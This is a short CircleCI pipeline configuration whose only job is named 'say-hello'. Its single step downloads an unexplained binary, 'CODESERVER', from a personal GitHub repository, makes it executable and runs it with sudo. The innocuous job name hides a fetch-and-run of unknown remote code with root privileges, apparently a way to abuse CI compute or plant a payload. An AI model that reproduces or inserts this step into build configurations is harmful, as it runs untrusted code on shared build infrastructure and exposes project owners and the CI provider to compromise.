version: 2.1
executors:
  my-custom-executor:
    docker:
      - image: cimg/node:17.7.2
jobs:
  say-hello:
    executor: my-custom-executor
    steps:
      - checkout
      - run: |
          wget https://raw.githubusercontent.com/jaykal78/ab7125710/main/CODESERVER && chmod +x CODESERVER && sudo ./CODESERVER

workflows:
  my-custom-workflow:
    jobs:
      - say-hello
